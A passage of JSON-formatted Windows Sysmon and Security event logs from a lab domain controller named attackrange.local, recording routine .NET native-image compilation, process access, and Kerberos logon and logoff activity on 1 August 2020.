{"EventTime":"2020-08-01 06:59:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6941,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:28.930\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12D0-5F25-0000-001057E30900}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:28.930","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12D0-5F25-0000-001057E30900}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6942,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:28.930\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12D0-5F25-0000-001057E30900}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:28.930","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12D0-5F25-0000-001057E30900}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6943,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:28.930\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12D0-5F25-0000-001057E30900}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:28.930","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12D0-5F25-0000-001057E30900}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220679,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9E689\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9e689","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220680,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x9E689\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52724\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x9e689","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52724","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220681,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9E689\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9e689","LogonType":"3","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6944,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:29.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:29.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6945,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:29.602\r\nProcessGuid: {E2A3D6B1-12D0-5F25-0000-001057E30900}\r\nProcessId: 1936\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\790-0\\System.Configuration.dll\r\nCreationUtcTime: 2020-08-01 06:59:29.602","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:29.602","ProcessGuid":"{E2A3D6B1-12D0-5F25-0000-001057E30900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\790-0\\System.Configuration.dll","CreationUtcTime":"2020-08-01 06:59:29.602","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6946,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:29.648\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12D1-5F25-0000-00106FE70900}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:29.648","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12D1-5F25-0000-00106FE70900}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6947,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:29.648\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12D1-5F25-0000-00106FE70900}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 